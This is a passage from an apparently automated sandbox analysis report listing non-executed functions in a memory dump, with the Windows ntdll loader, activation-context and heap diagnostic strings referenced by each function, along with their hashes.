                                                                                                                      • Instruction Fuzzy Hash: 76B09B719015D5C5DA11F7644608B17791077D0701F55C163E3034753F4778C1D1F275

                                                                                                                      Non-executed Functions

                                                                                                                      Function 01462349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-2160512332
                                                                                                                      • Opcode ID: 190219bc3a91ebad2a31e067d88fea31c1ee49e5ae9feed9210c64bcbdba344a
                                                                                                                      • Instruction ID: 58e4187218a43c17be614cb6dfeeea30f44483db6b213f140d1cb1b7131ce367
                                                                                                                      • Opcode Fuzzy Hash: 190219bc3a91ebad2a31e067d88fea31c1ee49e5ae9feed9210c64bcbdba344a
                                                                                                                      • Instruction Fuzzy Hash: 4E926C71604342ABE721DF19C880F6BBBE8BB94758F04492EFA9497361D7B0E845CB53
                                                                                                                      Function 01418620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014554E2
                                                                                                                      • Critical section address, xrefs: 01455425, 014554BC, 01455534
                                                                                                                      • double initialized or corrupted critical section, xrefs: 01455508
                                                                                                                      • corrupted critical section, xrefs: 014554C2
                                                                                                                      • Critical section address., xrefs: 01455502
                                                                                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 01455543
                                                                                                                      • Thread identifier, xrefs: 0145553A
                                                                                                                      • Critical section debug info address, xrefs: 0145541F, 0145552E
                                                                                                                      • Address of the debug info found in the active list., xrefs: 014554AE, 014554FA
                                                                                                                      • 8, xrefs: 014552E3
                                                                                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014554CE
                                                                                                                      • Invalid debug info address of this critical section, xrefs: 014554B6
                                                                                                                      • undeleted critical section in freed memory, xrefs: 0145542B
                                                                                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0145540A, 01455496, 01455519
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                      • API String ID: 0-2368682639
                                                                                                                      • Opcode ID: da6a48afc59ccdc8e9fc3779d67978c4d9574f344743af50f313b612091f6e67
                                                                                                                      • Instruction ID: e0c9d8dbba7038f4d17e5e0f9b6dc3bceae00e824c05eb7f7846b1896df60199
                                                                                                                      • Opcode Fuzzy Hash: da6a48afc59ccdc8e9fc3779d67978c4d9574f344743af50f313b612091f6e67
                                                                                                                      • Instruction Fuzzy Hash: 5181AFB1A41359EFDB60CF99C844BAEBBB5BB08B18F10415EF908BB361D375A941CB50
                                                                                                                      Function 014129F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 014522E4
                                                                                                                      • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01452409
                                                                                                                      • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01452624
                                                                                                                      • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01452506
                                                                                                                      • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 014524C0
                                                                                                                      • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01452498
                                                                                                                      • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01452602
                                                                                                                      • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01452412
                                                                                                                      • RtlpResolveAssemblyStorageMapEntry, xrefs: 0145261F
                                                                                                                      • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 014525EB
                                                                                                                      • @, xrefs: 0145259B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                      • API String ID: 0-4009184096
                                                                                                                      • Opcode ID: 72db42c61604017a6c4812ee22af042e00309ddeede0fc0fd3f8ecf8e2496d3a
                                                                                                                      • Instruction ID: 3a0ea6c359e2ceff1197b930ca7c777fb36866527d188f90df639f81dde1f8f4
                                                                                                                      • Opcode Fuzzy Hash: 72db42c61604017a6c4812ee22af042e00309ddeede0fc0fd3f8ecf8e2496d3a
                                                                                                                      • Instruction Fuzzy Hash: C40282B1D002299BDB61DB55CC80F9AB7B8AB54304F0041EBEB09A7252E7B09F85CF59
                                                                                                                      Function 01488B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                      • API String ID: 0-2515994595
                                                                                                                      • Opcode ID: 1e52e8241b0d6d86c41baa699e2ad07a210da41a9f6484381cbb21f5bdb4c4ad
                                                                                                                      • Instruction ID: 5293308b67d2931b799d69dbc755dba80cf9b7b21fa73d85ee94c079cc6280cb
                                                                                                                      • Opcode Fuzzy Hash: 1e52e8241b0d6d86c41baa699e2ad07a210da41a9f6484381cbb21f5bdb4c4ad
                                                                                                                      • Instruction Fuzzy Hash: 6B51CF755043129BC325EF198884BAFBBE8FFD4344F94491EEA58C32A4E770D609C792
                                                                                                                      Function 01490274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                      • API String ID: 0-1700792311
                                                                                                                      • Opcode ID: eff6c32735c578fd7355e10d556945a88082690db752ae8f0c3e11d0e5122b0f
                                                                                                                      • Instruction ID: 6811c3f5609f7d17d0254052a6c2569c9ddcb2310bd4931e0b4795c424f97b28
                                                                                                                      • Opcode Fuzzy Hash: eff6c32735c578fd7355e10d556945a88082690db752ae8f0c3e11d0e5122b0f
                                                                                                                      • Instruction Fuzzy Hash: 9FD1EA32601282DFDF22DF68D440AAEBFF5FF5A718F09805AE5499B762C7349981CB50
                                                                                                                      Function 014689B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • VerifierFlags, xrefs: 01468C50
                                                                                                                      • VerifierDlls, xrefs: 01468CBD
                                                                                                                      • VerifierDebug, xrefs: 01468CA5
                                                                                                                      • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01468A67
                                                                                                                      • AVRF: -*- final list of providers -*- , xrefs: 01468B8F
                                                                                                                      • HandleTraces, xrefs: 01468C8F
                                                                                                                      • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01468A3D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                      • API String ID: 0-3223716464
                                                                                                                      • Opcode ID: 9336bde297e7afa679c770457d5c1b4b8ae36c033a4538f23f0284bb1abf19f1
                                                                                                                      • Instruction ID: 5b709e60df679f665eb67613b90815c22a17c3013aa3fae5ad0c5556bd9e0f7c
                                                                                                                      • Opcode Fuzzy Hash: 9336bde297e7afa679c770457d5c1b4b8ae36c033a4538f23f0284bb1abf19f1
                                                                                                                      • Instruction Fuzzy Hash: B891F3726417139FDB21DF69D890B5B77A8AB64A1CF05041EFA40AF374CB709C058BA3
                                                                                                                      Function 013EEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                      • API String ID: 0-1109411897
                                                                                                                      • Opcode ID: 022b93922ff1923440ffc426dd9234e20cf673b45d46c9758c1fe85c41df126e
                                                                                                                      • Instruction ID: 57836b10ade8f7818a911babbaa9c5e7d1b8abf1fba0723f17e7b2059541d7f5
                                                                                                                      • Opcode Fuzzy Hash: 022b93922ff1923440ffc426dd9234e20cf673b45d46c9758c1fe85c41df126e
                                                                                                                      • Instruction Fuzzy Hash: AFA24D74A056298FEF64DF18CC987A9BBB5AF45304F1442EAD50DA73A0DB749E85CF00
                                                                                                                      Function 014163FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-792281065
                                                                                                                      • Opcode ID: e0cee76ec73d74398c63cccc9d53890efe5a84335255c945bc384c5a45dbbcd4
                                                                                                                      • Instruction ID: 64862e2558e9dd10e35b05ee5d36dc37337eb2fff7d0eb7fbb284acccd262a1f
                                                                                                                      • Opcode Fuzzy Hash: e0cee76ec73d74398c63cccc9d53890efe5a84335255c945bc384c5a45dbbcd4
                                                                                                                      • Instruction Fuzzy Hash: E1915770B413219BDB35DF19D845BAB7BB1AB10B58F05402FE9006F7B6E7B09882C795
                                                                                                                      Function 013D645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • apphelp.dll, xrefs: 013D6496
                                                                                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01439A2A
                                                                                                                      • LdrpInitShimEngine, xrefs: 014399F4, 01439A07, 01439A30
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01439A11, 01439A3A
                                                                                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01439A01
                                                                                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 014399ED
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-204845295
                                                                                                                      • Opcode ID: c0db3d60af01e9026374ee280320d9c0b8b5fec6d201bad05287fb62116de70c
                                                                                                                      • Instruction ID: cee57c25e1d132e16a6df3de4bcea69081bf3bc2372d1b7e006bf43265cc8cf2
                                                                                                                      • Opcode Fuzzy Hash: c0db3d60af01e9026374ee280320d9c0b8b5fec6d201bad05287fb62116de70c
                                                                                                                      • Instruction Fuzzy Hash: E65106B12083059FE724EF29D842B5B77E8FB88B48F00491EF59597270DB70E945CB92
                                                                                                                      Function 01412674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01452178
                                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 014521BF
                                                                                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0145219F
                                                                                                                      • RtlGetAssemblyStorageRoot, xrefs: 01452160, 0145219A, 014521BA
                                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 01452165
                                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01452180
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                      • API String ID: 0-861424205
                                                                                                                      • Opcode ID: b7bf5ee292f1b2fc44b6f33e3d500648b0e42252daf7c175d81722b77e7abfa9
                                                                                                                      • Instruction ID: 367ca2381762906f09f705b461a298586d103ea5b2261915af5a22112a3a0d96
                                                                                                                      • Opcode Fuzzy Hash: b7bf5ee292f1b2fc44b6f33e3d500648b0e42252daf7c175d81722b77e7abfa9
                                                                                                                      • Instruction Fuzzy Hash: 8631063AB40215B7E7218A9B9C41F5B7B68DB64A54F15005FFF04AB365D2B09E01CBA1
                                                                                                                      Function 0141C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • LdrpInitializeProcess, xrefs: 0141C6C4
                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01458181, 014581F5
                                                                                                                      • LdrpInitializeImportRedirection, xrefs: 01458177, 014581EB
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0141C6C3
                                                                                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 014581E5
                                                                                                                      • Loading import redirection DLL: '%wZ', xrefs: 01458170
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                      • API String ID: 0-475462383
                                                                                                                      • Opcode ID: 08a47a776e919a84e9ed39ecdaf4b7f6bca1f4eb22574512b84598acc1028b5e
                                                                                                                      • Instruction ID: 3f320f7795ecb03903fd21dd6ea592019c42e9dc0438123b9312dfca1fa32843
                                                                                                                      • Opcode Fuzzy Hash: 08a47a776e919a84e9ed39ecdaf4b7f6bca1f4eb22574512b84598acc1028b5e
                                                                                                                      • Instruction Fuzzy Hash: 6331E6B16443069BC324EF2ADC85E2B77A5EFA4B14F05451DF9846B3B1EA30ED04C7A2
                                                                                                                      Function 0142096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 01422DF0: LdrInitializeThunk.NTDLL ref: 01422DFA
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01420BA3
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01420BB6
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01420D60
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01420D74
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1404860816-0
                                                                                                                      • Opcode ID: 90b6e56ba8b8973421a90932f49b6a6a8adcc357a2fd9c590d3eec2ae66e81d1
                                                                                                                      • Instruction ID: 2a67ff6a35fe7d9cd6c1b3e88b3124f5df8dc036c1760ea370a2f0f3ea0e7b1f
                                                                                                                      • Opcode Fuzzy Hash: 90b6e56ba8b8973421a90932f49b6a6a8adcc357a2fd9c590d3eec2ae66e81d1
                                                                                                                      • Instruction Fuzzy Hash: 96426A71900715DFDB61CF28C880BAAB7F5BF14314F4445AAE989EB352E770AA85CF60
                                                                                                                      Function 013EA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                      • API String ID: 0-379654539
                                                                                                                      • Opcode ID: cb7b0723c460d60fe8aa0fcda8fbc07c19c65abbdfc7d3beb0877dd5320d82d1
                                                                                                                      • Instruction ID: 60c8c88c279cfbef549636f148a37893c5990a5afa81a68ace76c8b40bd748ab
                                                                                                                      • Opcode Fuzzy Hash: cb7b0723c460d60fe8aa0fcda8fbc07c19c65abbdfc7d3beb0877dd5320d82d1
                                                                                                                      • Instruction Fuzzy Hash: FAC1AC75108396CFD711CF58C048B6ABBE8BF84708F04886EF9959B7A0E774C949CB56
                                                                                                                      Function 01418402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • LdrpInitializeProcess, xrefs: 01418422
                                                                                                                      • @, xrefs: 01418591
                                                                                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0141855E
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01418421
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-1918872054
                                                                                                                      • Opcode ID: 1136e80d9ffa7ece02198a3d8605e28f41d0b64225403ef7d5a36a22445ba1e0
                                                                                                                      • Instruction ID: 1e3e778c139136626a2cfe84bdb622a1b2838acc01371714e430bcb507de2784
                                                                                                                      • Opcode Fuzzy Hash: 1136e80d9ffa7ece02198a3d8605e28f41d0b64225403ef7d5a36a22445ba1e0
                                                                                                                      • Instruction Fuzzy Hash: EE91AC71548346AFD721DF26CC80FABBBE8FB94644F40092FFA8896165E770D944CB62
                                                                                                                      Function 0141273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • .Local, xrefs: 014128D8
                                                                                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 014521D9, 014522B1
                                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 014522B6
                                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 014521DE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                      • API String ID: 0-1239276146
                                                                                                                      • Opcode ID: 516a89a703954804b8e052c2aef2864570b707dc7cc752045250b4bddf85ec1f
                                                                                                                      • Instruction ID: e0e4840cd4b8eb2ae1a8e17d74cf36090f7b71063d9f428e17db3e5e54e02725
                                                                                                                      • Opcode Fuzzy Hash: 516a89a703954804b8e052c2aef2864570b707dc7cc752045250b4bddf85ec1f
                                                                                                                      • Instruction Fuzzy Hash: B7A1AF35A00229DBDB24CF58D884BAAB7B1BF58354F2401EBE908E7365D7709E81CF80
                                                                                                                      Function 01414AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01453437
                                                                                                                      • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01453456
                                                                                                                      • RtlDeactivateActivationContext, xrefs: 01453425, 01453432, 01453451
                                                                                                                      • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0145342A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                      • API String ID: 0-1245972979
                                                                                                                      • Opcode ID: 9eda996fdc93ca1aaa56eb86c7d8ce7ce8ed3310758a9e287a3d180c495803ad
                                                                                                                      • Instruction ID: e22ec0d573f86df966b4a62ae7df19eea6f19389416da1c6acc4d8604b7f7b43
                                                                                                                      • Opcode Fuzzy Hash: 9eda996fdc93ca1aaa56eb86c7d8ce7ce8ed3310758a9e287a3d180c495803ad
                                                                                                                      • Instruction Fuzzy Hash: 106122326407129BD722CF1DC841B2BBBE4BF91B94F19852EE9559B366D730E801CB91
                                                                                                                      Function 013E64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0144106B
                                                                                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01441028
                                                                                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 014410AE
                                                                                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01440FE5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                      • API String ID: 0-1468400865
                                                                                                                      • Opcode ID: 6f993be0ffc2dfe97061cf1137d48f638bd1982a4e16f801dd9f4eda8a738e6b
                                                                                                                      • Instruction ID: 692621783a5342711110106de84a6e73b6b95c7838f4cb4f4064015c8c7f02af
                                                                                                                      • Opcode Fuzzy Hash: 6f993be0ffc2dfe97061cf1137d48f638bd1982a4e16f801dd9f4eda8a738e6b
                                                                                                                      • Instruction Fuzzy Hash: 3B71DFB1A043159FDB20DF19C885B9B7FE8AFA4758F40046DF9488B296D734D588CB92
